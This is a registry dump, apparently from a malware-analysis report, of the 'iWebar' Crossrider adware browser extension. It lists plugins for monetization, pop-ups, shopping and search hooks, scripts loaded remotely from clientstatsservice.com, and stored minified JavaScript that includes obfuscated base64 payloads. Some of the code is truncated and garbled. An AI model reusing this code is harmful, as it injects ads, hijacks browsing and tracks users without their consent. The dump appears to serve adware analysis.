"JavaScript" = "(function(a){appAPI.queueManager={queue:[],register:function(b){this.queue.push(b);}};appAPI.ready=function(c,b){a.when.apply(null,appAPI.queueManager.queue).then(function(){a.when(appAPI.initializerPlugin.isReady(b)).then(function(){new Function('if (typeof jQuery === undefined) { jQuery = $jquery_171; }(' appAPI.resources.parseIncludeJS(c.toString()) )($jquery_171))();});});};}($jquery_171));var CrossRiderResourcesManager=(function(z){var B={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.resources,env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:appAPI.debugManager.isDebug()&&appAPI.debugManager.getResourcesPath(),isIE7:z.browser.msie&&z.browser.version*1==7},x=new z.Deferred(),h=K(meta)||{},D=K(remote_resources)||{remoteId:0},e=K(queue)||{},g=initialVersion=K(lastVersion)||0;return z.Class.extend({init:function(){appAPI.queueManager.register(x.promise());if(B.isDebug){x.resolve();}el"

[HKCU\Software\iWebar\Manifest]
"Name" = "iWebar"

[HKCU\Software\iWebar\Plugins\46]
"Version" = "5"

[HKCU\Software\iWebar\Manifest]
"UninstallerOfferUrl" = "NA"

[HKCU\Software\iWebar\Plugins\3]
"Version" = "2"

[HKCU\Software\iWebar\Installer]
"osName" = "XP32"

[HKCU\Software\iWebar\Plugins\104]
"Name" = "jollywallet_m"

[HKCU\Software\iWebar\Plugins\94]
"Name" = "IEPopup"

[HKCU\Software\iWebar\Plugins\2]
"Version" = "2"

[HKCU\Software\iWebar\Manifest]
"PublisherName" = "iWebar"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\iWebar\Plugins\91]
"Name" = "monetizationLoader.js"

[HKCU\Software\iWebar\Plugins\44]
"Name" = "IEMisc"

[HKCU\Software\iWebar\Plugins\195]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[195]=function(){if(!appAPI.internal.monetization.shouldRunByVertical(195,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:LITE}))();};"

[HKCU\Software\iWebar\Code]
"BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"

[HKCU\Software\iWebar\Plugins\45]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.tabId=onRequest;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;(function(){function a(e){var c=appAPI.internal.prefs.getChar(e,Crossrider\\onRequest);if(typeof c!==string){return 0;}if(c.length===0){return 0;}c=appAPI.JSON.parse(c);if(typeof c!==object){return 0;}var d=0;for(var b in c){d ;appAPI.internal.callbacks.addListener(onRequest,function(m,g){var n=appAPI.internal.callbacks.onRequest.listenersAdditionalData[g];if(typeof n.code!==string){return;}var f={};var i;if(typeof n.value===undefined){i=undefined;}else{if(n.value===nAJ"

[HKCU\Software\iWebar\Plugins\41]
"Name" = "IEInfo"

[HKCU\Software\iWebar\Plugins\38]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberOWH"

[HKCU\Software\iWebar\Plugins]
"OnRequestPluginList" = "14,42,41,39,38,43,45,64,72"

[HKCU\Software\iWebar\Plugins\2]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

[HKCU\Software\iWebar\Plugins\182]
"Version" = "3"

[HKCU\Software\iWebar\Plugins\195]
"Version" = "25"

[HKCU\Software\iWebar\Manifest]
"RunInFrame" = "false"

[HKCU\Software\iWebar\Plugins\1]
"JavaScript" = "appAPI._cr_config={appID:function(){var a=appAPI.appInfo;if(a){return appAPI.appInfo.id;}else{return appAPI.appID;}}};$jquery.extend(appAPI._cr_config,{sidebar:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},css:/plugins/stylesheets/sidebar.css,themes:/plugins/images/sidebar}});$jquery.extend(appAPI._cr_config,{notifications_manager:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},statsBase:{production:http://nstats.crossrider.com,staging:http://staging-app.crossrider.com},geolocation:http://www.geoplugin.net/json.gp?jsoncallback=fn,meta:/notifier/ appAPI._cr_config.appID() /meta.json,messages:/notifier/ appAPI._cr_config.appID() /{id}.json,logger:/notifications.gif,loggerAPI:/api_notifications.gif},notifications:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},css:/plugins/stylesheets/notifications.css,themes:/plugins/images/notifications}});G"

[HKCU\Software\iWebar\Plugins\184]
"Name" = "noproblemppc_m"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\iWebar\Plugins\7]
"Version" = "2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\iWebar\Plugins\204]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDI3YzY1NTcwMjExMDAxOTIxMDQxNTU0NTY1NTQ4MGQwMDFkMDQ0YzU2NTkxYjA2NDQxNTA2MDAxNzEzMWQxMzE4MTAwOTExNWEwYTFiMWI1NjA1NDMwNTBlMGYwNzVjNDc0MDRiNDcwZDQ2MGYwMDRjNWE0NTE1NTcxYzFmNGExOTBjMTA1NDJiMjkzYTI0MjMyNjM5MzczZDJkMzEyNDI2MjUzOTM3MzUyYzMwMzYyYjU0NTU3YzY1NTcwMjExMDAxOTA3MjMwYjFhNGU0ZjRhNDcxYzFkMDAwNjBhNGM0MzVhMWQxNjVhMTkwNjFmMWExMzA4MTAxZTAwMTcxZDVhMTUxNjFiNDMwNjQ1MTUxMDAzMDc0MzRhNDA1ZTQ0MGI1NjExMGM0YzQ1NDgxNTQyMWYxOTVhMDcwMDEwNGIyNjI5MmYyNzI1MzYyNzNiM2QzMjNjMjQzMzI2M2YyNzJiMjAzMDI5MjY1NDQwN2Y2MzQ3MDQwNTAxMTExMDE4MjUxMTQ4NWY1NDViNDQ0MjU1N2M0YzU1NGE0NTU2MWYxMTA0MGQxZjBmMTQwNjQ3NGU0OTJmNTQwYTFlMDMwNTFhMGMxYTBlNTYyYjczMGI=', 'yvlujetitv'); }"

[HKCU\Software\iWebar\Plugins\207]
"Name" = "dbWrapper"

[HKCU\Software\iWebar\Plugins\64]
"URL" = "http://js.clientstatsservice.com/plugins/mins/appApiMessage.js"

[HKCU\Software\iWebar\Plugins\7]
"JavaScript" = "appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};"

[HKCU\Software\iWebar\Plugins\4]
"Name" = "jquery_1_7_1"

[HKCU\Software\iWebar\Manifest]
"SetNewTab" = "false"

[HKCU\Software\iWebar\Plugins\183]
"URL" = "http://js.clientstatsservice.com/plugins/mins/tabsWrapper.js"

[HKCU\Software\iWebar\Manifest]
"AddressbarURL" = "NA"

[HKCU\Software\iWebar\Plugins\40]
"URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEExtension.js"

[HKCU\Software\iWebar\Plugins\223]
"Name" = "imonomy_m"

[HKCU\Software\iWebar\Plugins\155]
"Version" = "3"

[HKCU\Software\iWebar\Plugins\14]
"JavaScript" = "if(typeof(appAPI)===undefined){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==undefined&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){CR__bIsIEWindow=/MSIE (\d \.\d );/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==undefined));appAPI.JSON={};if(typeof JSON!==undefined&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n<10?0 n:n;}if(typeof Date.prototype.to_CR_JSON!==function){Date.prototype.to_CR_JSON=function(key){return isFinite(this.valueOf())?this.getUTCFullYear() - f(this.getUTCMonth() 1) - f(this.getUTCDate()) T f(this.getUTCHours()) : f(this.getUTCMinutes()) : f(this.getUTCSeconds()) Z:null;};String.prototype.to_CR_JSON=Number.prototype.to_CR_JSON=Boolean.prototype.to_CR_JSON=function(key){return this.valueOf();};}var cx=/[\u0000\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,escapable=/[\\\\x00-\x1f\x7f-䍰6"

[HKCU\Software\iWebar\Installer]
"subid" = "0"

[HKCU\Software\iWebar\Plugins\14]
"Version" = "11"

[HKCU\Software\iWebar\Plugins\104]
"JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[104] = function() { if (!appAPI.internal.monetization.shouldRunByVertical(104, [shopping])){ return; } var app_id='0'; var uid='0'; var app_name = ''; try{app_name = '&name=' encodeURIComponent(appAPI.appInfo.name);} catch(e) {app_name='';} try{app_id = appAPI.appInfo.id;}catch(err){} if (appAPI && appAPI.installer && appAPI.installer.getParams) { app_id = appAPI.installer.getParams().source_id; } if(appAPI && appAPI.installer && appAPI.installer.getUserId){uid=appAPI.installer.getUserId();} var token = appAPI.db.get(jw_token); if(token === '' || token===null || token === undefined){ var S4 = function() {return (((1 Math.random())*0x10000)|0).toString(16).substring(1);}; token=(S4() S4() - S4() - S4() - S4() - S4() S4() S4()); appAPI.db.set(jw_token,tokeG"

[HKCU\Software\iWebar\Plugins\1]
"URL" = "http://js.clientstatsservice.com/plugins/mins/base.js"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\iWebar\Plugins\43]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}if(typeof appAPI.internal.message===undefined){appAPI.internal.message={};}appAPI.internal.message.send=function(b){if(typeof b!==object){return false;}if(typeof b.eventName!==string){return false;}b.senderTabId=appAPI.tabId;var c;try{c=appAPI.JSON.stringify(b);}catch(a){console.error(appAPI.message error - Caught a JSON exception when trying to stringify the message);return false;}if(typeof c!==string){console.error(appAPI.message error - Failed to stringify message);return false;}if(c.length>8192){console.error(appAPI.message error - can't send message because content is too long: c.length);return false;}appAPIinternal.msgToAllTabs(c);return true;};appAPI.internal.callbacks.crossBhoEvent=function(b){if(typeof b.msgObj!==string){return;}try{b=appAPI.JSON.parse(b.msgObj);}catch(c){console.error(Failed to parsR6"

[HKCU\Software\iWebar\Plugins\14]
"Name" = "CrossriderUtils"

[HKCU\Software\iWebar\Plugins\17]
"JavaScript" = "if(typeof window!==undefined){/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */var $$jquery;(function(aO,D){var a=function(e,a0){return new a.fn.init(e,a0);},o=aO.jQuery,S=aO.$,ac=aO.document,Y,Q=/^[^<]*(<[\w\W] >)[^>]*$|^#([\w-] )$/,aY=/^.[^:#\[\.,]*$/,az=/\S/,N=/^(\s|\u00A0) |(\s|\u00A0) $/g,f=/^<(\w )\s*\/?>(?:<\/\1>)?$/,b=navigator.userAgent,v,L=false,af=[],aI,av=Object.prototype.toString,ar=Object.prototype.hasOwnProperty,h=Array.prototype.push,G=Array.prototype.slice,t=Array.prototype.indexOf;a.fn=a.prototype={init:function(e,a2){var a1,a3,a0,a4;if(!e){return this;}if(e.nodeType){this.context=this[0]=e;this.length=1;return this;}if(e===body&&!a2){this.context=ac;this[0]=ac.body;this.se6"

[HKCU\Software\iWebar\Plugins\14]
"URL" = "http://js.clientstatsservice.com/plugins/mins/CrossriderUtils.js"

[HKCU\Software\iWebar\Plugins\43]
"Name" = "IEMessaging"

[HKCU\Software\iWebar\Plugins\184]
"Version" = "9"

[HKCU\Software\iWebar\Plugins\35]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(e){if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}function f(m){if(typeof m===object){return m;}if(typeof m!==string){return null;}m=m.replace(/\r\n/g,\n);if(m.lastIndexOf(\n) 1==m.length){m.replace(/(?:(?:^|\n)\s |\s (?:$|\n))/g,).replace(/\s /g, );}var n=m.split(\n);var l={};for(var k=0;k
[HKCU\Software\iWebar\Plugins\38]
"URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IECallbacks.js"

[HKCU\Software\iWebar\Plugins\36]
"Version" = "8"

[HKCU\Software\iWebar\Plugins\21]
"URL" = "http://js.clientstatsservice.com/plugins/mins/debug.js"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E3 F1 6B E3 DA F4 65 48 E4 41 47 0D 66 BE CB 20"

[HKCU\Software\iWebar\Plugins\217]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[217]=function(){var a=(function(e){String.prototype.replaceAll=function(h,g){return this.split(h).join(g);};var d=e(window);e.fn.visible=function(g,B,G){if(this.length<1){return;}var C=this.length>1?this.eq(0):this,u=C.get(0),v=d.width(),k=d.height(),G=(G)?G:both,l=B===true?u.offsetWidth*u.offsetHeight:true;if(typeof u.getBoundingClientRect===function){var p=u.getBoundingClientRect(),I=p.top>=0&&p.top0&&p.bottom<=k,D=p.left>=0&&p.left0&&p.right<=v,h=g?I||n:I&&n,x=g?D||D:D&&y;if(G===both){return l&&h&&x;}else{if(G===vertical){return l&&h;}else{if(G===horizontal){return l&&x;}}}}else{var w=d.scrollTop(),q=w k,F=d.scrollLeft(),H=F v,m=C.offset(),z=m.top,A=z C.height(),E=m.left,s=E C.width(),i=g===true?A:z,j=g===true?z:A,r=g===true?s:E,o=g===true?E:s;if(G===both){return !!l&&H"

[HKCU\Software\iWebar\Plugins\2]
"URL" = "http://js.clientstatsservice.com/plugins/mins/ie8_fix_1.js"

[HKCU\Software\iWebar\Plugins\28]
"JavaScript" = "var CrossriderInitializerPlugin=(function(e){var c={appId:appAPI._cr_config.appID()},b,g=new e.Deferred(),f;return e.Class.extend({init:function(){b=this;e(document).ready(function(){if(!f){d();}e(body).bindExtensionEvent(__CR_REQUEST_READY,a);});},isReady:function(h){if(h===false){d();}return g.promise();}});function d(){g.resolve();f=true;}function a(){e(body).fireExtensionEvent(__CR_RESPONSE_READY,{appId:c.appId});}}($jquery_171));(function(a){appAPI.initializerPlugin=new CrossriderInitializerPlugin();}($jquery_171));"

[HKCU\Software\iWebar\Plugins\72]
"JavaScript" = "if(appAPI.__should_activate_validation__===true){(function(){var e={WRONG_STRICT_VALUE:Parameter %PARAM_NAME% value is not supported.,WRONG_TYPE:Parameter %PARAM_NAME% is of wrong type. Valid types: [%VALID_TYPES%].,PARAM_IS_MANDATORY:Parameter %PARAM_NAME% is mandatory.,DB_VAL_TOO_LARGE:appAPI.db storage is limited to 1000 bytes per key. For larger values please use appAPI.db.async};var a=function(m){return m.charAt(0).toUpperCase() m.slice(1);};var h={};var b=appAPI.appInfo.name;var i=function(o,r,q,p){if(typeof p===undefined){p=;}var n=[ new Date().toDateString() new Date().toLocaleTimeString() ] b;var m=;if(typeof console!==undefined){if((q===e.DB_VAL_TOO_LARGE)&&(typeof console.warn===function)){console.warn(n m);}else{if(typeof console.error===function){console.error(n m);}else{if(typeof console.log===function){console.log(n m);}}}}return;};var l=function(p,n,o){var m=pg6"

[HKCU\Software\iWebar\Plugins\41]
"Version" = "7"

[HKCU\Software\iWebar\Plugins\21]
"JavaScript" = "var CrossriderDebugManager=(function(h){var f={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.debug_app};return h.Class.extend({init:function(){if(appAPI.isMatchPages.apply(this,f.url.debug_page)){h(document).ready(function(){h(""body"").bindExtensionEvent(""debug_request_data"",function(j,i){if(i.appId==f.appId){e();}});h(""body"").bindExtensionEvent(""debug_request_reload_background"",function(j,i){if(i.appId==f.appId&&appAPI.internal.reloadBackground){appAPI.internal.reloadBackground();}});h(""body"").bindExtensionEvent(""debug_request_reload_plugins"",function(j,i){if(i.appId==f.appId){appAPI.resources.requestReload();setTimeout(appAPI.internal.forceUpdate,750);}});h(""body"").bindExtensionEvent(""debug_mode_activate"",function(j,i){if(i.appId==f.appId){b(i);}});h(""body"").bindExtensionEvent(""debug_mode_deactivate"",function(j,i){if(i.appId==f.appId){d();}});h(""body"").bindExtensionEvent(""debug_request_database"",function(j,i){if(i.appId==f.appId){c(i);}});h(""body"").bindExtensionEvent(""debug_request_database_remove""

[HKCU\Software\iWebar\Plugins\155]
"Name" = "ibario_pops_m"

[HKCU\Software\iWebar\Manifest]
"PluginsManifestVersion" = "133"
"homepageurl" = "NA"

[HKCU\Software\iWebar\Installer]
"FullVersion" = "1.34.5.12"

[HKCU\Software\iWebar\Plugins\94]
"Version" = "2"

[HKLM\SOFTWARE\iWebar\IE\Profiles]
"S-1-5-21-1844237615-1960408961-1801674531-1003" = "1"

[HKCU\Software\iWebar\Plugins\177]
"Version" = "2"

[HKCU\Software\iWebar\Plugins\35]
"URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEAjax.js"

[HKCU\Software\iWebar\Plugins\2]
"Name" = "ie8_fix_1"

[HKCU\Software\iWebar\Plugins\39]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(c){appAPI.cookie=function(h,k,f,i){var g=""%@%ZZCR__AJAXZZ$C@R#"";function e(o,q,l,p){if(typeof(o)!==""string""){return false;}var n=appAPI.JSON.stringify(q);var m=new Date(2030,1,1,0,0,0,0);if(l instanceof Date){m=l;}c.setLocalCookie(o,n,m.toUTCString(),p);return true;}function j(m,n){if(m==""InstallerParams""&&n==""Local""){return appAPI.JSON.parse(appAPI.internal.prefs.getChar(""Params""

[HKCU\Software\iWebar\Plugins\78]
"Version" = "5"

[HKCU\Software\iWebar\Plugins\226]
"URL" = "http://js.clientstatsservice.com/plugins/javascripts/monetization/geo/set_campaign_id_m.js"

[HKCU\Software\iWebar\Plugins\246]
"Name" = "setup"

[HKCU\Software\iWebar\Manifest]
"ModeType" = "production"

[HKCU\Software\iWebar\Plugins\37]
"Version" = "6"

[HKCU\Software\iWebar\Installer]
"DefaultBrowser" = "ie"

[HKCU\Software\iWebar\Plugins\39]
"Name" = "IEDatabase"

[HKCU\Software\iWebar\Plugins]
"AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,182,183,207,72,7,9,93,102,104,155,184,220,195,204,217,223,244,177,91,28"

[HKCU\Software\iWebar\Plugins\13]
"JavaScript" = "(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection();}else{if(document.getSelection){return document.getSelection();}else{var f=document.selection&&document.selection.createRange();if(f.text){return f.text;}return false;}}return false;}if(e==null){a.debug(selectedText: no callback function provided.);return;}if(c==null){c={};}c.lastSelection=;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){caseundefined:b=$jquery(body);break;caseobject:if(c.element instanceof jQuery){b=c.element;}else{a.debug(selectedText: element provided as an unrecorgnize object.);return;}break;casestring:b=$jquery(c.element);break;default:a.debug(selectedText: unknown element.);return;}b.mouseup(function(g){var f=d();if(f&&String(f)==c.lastSelection){c.lastSelection=;return;}else{c.lastSelection=String(f);}if(f&&String(f).length>=c.minlength&&String(f).length<=c.maxlength){e(f,g);}});};})(appAPI);(function(b){var c=functi뿜G"

[HKCU\Software\iWebar\Plugins\72]
"Version" = "5"

[HKCU\Software\iWebar\Plugins\184]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ3ZjczNDQwYTE3MWIwNTMzMTMwYTU3NDA0NjQwMGIxYjAxMTY1YjQ5NWExNDE2MTE0ZDAxMWExNjEzMDkxNzE2MDMwZjEzMWYxNjQ4MDIwOTE4NTUwODEyMTAwZDVhMGEwZTAxMWMxOTQ4MDgxMDUwM2ExNDA4MDExYzE0MmYwNjVlMmE0ZDI3NTUyNzQ3NDkyNzRmMjE1ZjQ2NTI0YzIzNDc0YjU3NGYyMjU2MzQ1NjRjNTY0NTRiNTM1MzU0MmI0NDU2Mjc1MDMwNWMzNTBiMTcwYTNjMDI1YzM1MTQxNjAzMTE0NTNmMTQxNDE1MDgxMDA4MmYyNjVlNWQ0NTU2NTE1NjUzMmExNDBkMDcxYTE2MTIyZjA3MTgxZjViM2QzYzJjMjcyOTMyMzUyNzMzMjIyNzMxMzAzNDM2MzEzOTNiM2IyYjI3M2MzMDUzMzIwZTA5MTkxODA3MTAyYTBiNDgzOTNlMjUyNzM1MzUzMTMxMjYzMTIzMzMzOTI2MmYyNDNkMmEyYjJhMzk0MzRhN2Y3MzQ0MGExNzFiMDUxNTM0MTQxOTU4NWM0MjQxMDcwMTEyMTExNTRmNTU0OTBjMTMxYzViMDgwZTE2MDcxNTA0MGUwNjAyMDUxNjAyNDgxNjE1MGI0ZDBkMWYwNjA0NGUwYTFhMWQwZjAxNGQwNTA2NTkyZTE0MWMxZDBmMGMyYTBiNDgyMzU5Mjc0MTNiNTQ1MTIyNDIzNzU2NTI1MjU4M2Y1NDUzNTI0MjM0NWYyMDU2NTg0YTU2NTM1NjVlNDIyMjUwNTYzMzRjMjM0NDMwMDYwMTAzMjgwMjQ4MjkwNzBlMDYxYzUzMzYwMDE0MDExNDAzMTAyYTJiNDg1NDUxNTY0NTRhNDAzMjExMDAxMTEzMDIxMjNiMWIwYjA3NWUzMDJhMjUzMzI5MjYyOTM0MmIyNzJhMjczOTIwMzYyNTI1MjgyMzJlMmE6"

[HKCU\Software\iWebar\Plugins\43]
"Version" = "5"

[HKCU\Software\iWebar\Plugins\41]
"URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEInfo.js"

[HKCU\Software\iWebar]
"ActiveAppId" = "35510"

[HKCU\Software\iWebar\Plugins]
"BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64,72"

[HKCU\Software\iWebar\Plugins\21]
"Name" = "debug"

[HKCU\Software\iWebar\Plugins\47]
"Name" = "resources_background"

[HKCU\Software\iWebar\Plugins\217]
"Name" = "similar_products_m"

[HKCU\Software\iWebar\Manifest]
"PublisherId" = "21836"

[HKCU\Software\iWebar\Plugins\183]
"Name" = "tabsWrapper"

[HKCU\Software\iWebar\Plugins\64]
"Name" = "appApiMessage"

[HKCU\Software\Crossrider]
"Verifier" = "cf88a6e798062720061920ae8ad681d4"

[HKCU\Software\iWebar\Plugins\42]
"URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEInternal.js"

[HKCU\Software\iWebar\Plugins\35]
"Version" = "4"

[HKCU\Software\iWebar\Plugins\9]
"Name" = "search_engine_hook"

[HKCU\Software\iWebar\Plugins\3]
"URL" = "http://js.clientstatsservice.com/plugins/mins/ie8_fix_2.js"

[HKCU\Software\iWebar\Plugins\4]
"Version" = "4"

[HKCU\Software\iWebar\Plugins\182]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var c={DUMMY_PAGE_URL:http://page.our-app.net/blank/resource.html};(function(){if(appAPI&&appAPI.internal&&appAPI.internal.hosts&&typeof appAPI.internal.hosts.dummyPageUrl===string&&appAPI.internal.hosts.dummyPageUrl.length>0){c.DUMMY_PAGE_URL=appAPI.internal.hosts.dummyPageUrl;}}());appAPI.openURL=(function(){var d=appAPI.openURL;var e=function(g){d({url:c.DUMMY_PAGE_URL ?appid= appAPI.appInfo.id &resourcepath= escape(g.resourcePath) &rnd= (new Date()).getTime(),where:g.where,focus:g.focus,focusTimer:g.focusTimer,left:g.left,top:g.top,height:g.height,width:g.width});};var f=function(g){if(!appAPI.utils.isObject(g)){return;}if(!appAPI.utils.isDefined(g.resourcePath)){d(g);return;}e(g);};return function(h,g){var i=h;try{if(appAPI.utils.isString(h)){d(h,g);return;}f(i);}catch(j){}};}());var a=function(){(function(){var f=document.createElement(link);f.type=image/x-icon;f.rel=shortcut icon;f.href=;document.getElementsByTagName(head)[0]6"

[HKCU\Software\iWebar\Plugins\37]
"URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEBrowserEvents.js"

[HKCU\Software\iWebar\Plugins\39]
"Version" = "5"

[HKCU\Software\iWebar\Plugins\182]
"URL" = "http://js.clientstatsservice.com/plugins/mins/openUrl.js"

[HKCU\Software\iWebar\Plugins]
"BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,183,207,47,182,72,93,102,155,184,204,223,226,244,91"

[HKCU\Software\iWebar\Plugins\184]
"URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/noproblemppc_m.js"

[HKCU\Software\iWebar\Plugins\204]
"Name" = "pricedetect_m"

[HKCU\Software\iWebar\Plugins\177]
"Name" = "crossriderDashboard"

[HKCU\Software\iWebar\Plugins\204]
"Version" = "5"

[HKCU\Software\iWebar\Plugins\40]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.scope=Consts.SCOPE.PAGE;appAPI.internal.callbacks.setEventHandler(externalConsole,function(a){if(appAPI.dom.isIframe()){return;}var c=a.level;var b=a.text;if(typeof c===undefined){console.error(Received undefined Background console level);return;}if(typeof console[c]===undefined){console.error(Received undefined Background console level);return;}if(typeof b===undefined){console.error(Received undefined Background console text);return;}console[c](b);});appAPI.internal.callbacks.setEventHandler(onBeforeNavigate,function(a){});appAPI.internal.callbacks.setEventHandler(windowOpen,function(a){if(appAPI.dom.isIframe()||!appAPI.isActiveTab()){return;}window.open(a.url,a.name,a.specs,a.replace);});try{if(!appAPI.dom.isIframe()){appAPI.internal.activeTabCounter=0;setInterval(function(){if(appAPI.isActi"

[HKCU\Software\iWebar\Plugins\207]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=$jquery_171;function c(f){return true;}function b(g,f){f=appAPI.utils.isFunction(f)?f:c;return d.map(g,function(h){return f(h)?h:null;});}function a(f){f.getList=(function(){var g=f.getList;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.getKeys=(function(){var g=f.getKeys;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.removeAll=(function(){var g=f.removeAll;return function(h){if(!appAPI.utils.isObject(h)){return g.call(f);}d.each(f.getList(h),function(j,k){f.remove(k.key);});};}());}function e(g){g.getList=(function(){var h=g.getList;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callback)){return;}h.call(g,function(j){i.callback(b(j,i.predicate));});};}());g.getKeys=(function(){var h=g.getKeys;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callbacG"

[HKCU\Software\iWebar\Plugins\226]
"Version" = "4"

[HKCU\Software\iWebar\Plugins\9]
"Version" = "3"

[HKCU\Software\iWebar\Plugins\17]
"Name" = "jQuery"

[HKCU\Software\iWebar\Plugins\244]
"Name" = "engageya_inner_m"

[HKCU\Software\iWebar\Plugins\37]
